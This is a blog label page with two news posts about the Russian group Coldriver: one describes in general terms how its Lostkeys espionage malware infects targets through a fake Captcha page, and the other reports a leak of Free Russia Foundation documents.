Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Coldriver hacker group. Show all posts
Russian Hackers
COLDRIVER Coldriver hacker group Cyber Attacks cyber espionage data security espionage Hacker attack Malware Attack Malwares Russian Hackers

Lostkeys Malware: Russian Group Coldriver Targets Western Officials in Espionage Campaign

 

A new wave of cyber espionage has emerged, with Russian hackers deploying a sophisticated malware strain known as “Lostkeys” to infiltrate the systems of Western officials, journalists, and NGOs. According to researchers from Google’s Threat Intelligence Group, the malware is linked to Coldriver, also known as UNC4057, Star Blizzard, or Callisto—a threat actor believed to be part of Russia’s Federal Security Service (FSB), the successor to the KGB. 

Coldriver has traditionally been involved in phishing operations to steal credentials, but the emergence of Lostkeys demonstrates a significant leap in their cyber capabilities. Lostkeys appears to mark a shift in strategy for the group, moving beyond phishing and into deeper system infiltration. The malware is deployed in a targeted manner, reserved for high-value individuals such as political advisors, think tank members, journalists, and people with known connections to Ukraine.

Activity related to Lostkeys was observed by Google in the early months of 2024—specifically January, March, and April—with evidence suggesting its use might have started as far back as December 2023. The attack begins with a deceptive Captcha page, tricking victims into copying a malicious PowerShell script into the Windows Run dialog. This method, known as “ClickFix,” bypasses typical security filters and exploits user behavior rather than software vulnerabilities. 

Once executed, the script connects to a command-and-control server, downloading a series of payloads uniquely tailored to each victim. In an effort to avoid detection, the malware includes anti-sandbox measures. During the second stage of infection, the script checks the screen resolution of the host machine and halts if it matches known virtual machine environments used by analysts and cybersecurity researchers. If the device passes this check, the malware proceeds to the final stage—a Visual Basic Script that steals data, including specific file types, system details, and active processes. These are exfiltrated back to the attackers using an encoded system that applies a unique two-key substitution cipher for each infected machine. 

Lostkeys appears to be a more refined successor to a previous malware strain known as Spica, which Coldriver also deployed in 2024. While both strains focus on data exfiltration, Lostkeys features a more intricate delivery system and improved obfuscation techniques. Some earlier samples of Lostkeys mimicked legitimate software like Maltego and used executable files instead of PowerShell, though Google has not confirmed if these instances were part of the same campaign or the work of a different threat actor reusing Coldriver’s tactics. 

This development highlights an alarming evolution in state-backed cyber operations, where advanced social engineering and stealth techniques are being increasingly used to infiltrate high-profile targets. As geopolitical tensions persist, the risks posed by such targeted cyber espionage campaigns are expected to grow.
Read more »
Russia data leak
Coldriver hacker group Cyber Attacks cyberattack investigation Free Russia Foundation Kremlin cyberattacks pro-democracy organization Russia data leak

Free Russia Foundation Investigates Potential Cyberattack Amid Leak of Sensitive Documents

 

One of Russia’s leading pro-democracy groups, the Free Russia Foundation, announced on Friday that it is investigating a potential cyberattack following the online leak of thousands of emails and documents related to its operations.

On Thursday, the Telegram channel SOTA reported that over 2,500 email chains and more than 13GB of electronic documents from the Free Russia Foundation and The US Russia Foundation had been published online.

The Free Russia Foundation stated it is “closely monitoring the illegal dissemination of documents allegedly pertaining to our operations” and has “launched an investigation to determine the origin, full extent, and nature of this breach.”

The foundation suggested that the leak might be connected to recent cyberattacks by the Kremlin-linked hacker group Coldriver, noting, “A number of entities have been compromised, resulting in the theft of their correspondence, including grant reports and internal documents.” The group warned that the attack might be used as “a pretext for a new wave of repression against pro-democracy Russians.”

Additionally, SOTA reported that the personal data of staff members at a facility in Tbilisi, Georgia—known as the “elf factory”—was also leaked. According to independent Russian media outlet The Bell, this facility is where employees are paid to post criticisms of Russian authorities and the war in Ukraine online.

The Free Russia Foundation, a nonprofit established in 2014 by Russians in the United States and currently led by Natalia Arno, aims to promote “a free, democratic, peaceful, and prosperous Russia reintegrated into the international community as a constructive and positive actor.”

In 2019, the Russian Justice Ministry labeled the Free Russia Foundation as an “undesirable organisation” and later, in July, added it to its list of “extremist organisations.”

The foundation commented on the attack, stating, “This attack does not come as a surprise, as everyone who opposes Putin and his system, whether in our team or in other human rights or political opposition organisations, faces risk every day.” Despite the breach, the foundation affirmed its commitment to “stopping the criminal war unleashed by Putin’s regime on Ukraine and to making Russia free and democratic.”
Read more »
Subscribe to: Posts (Atom)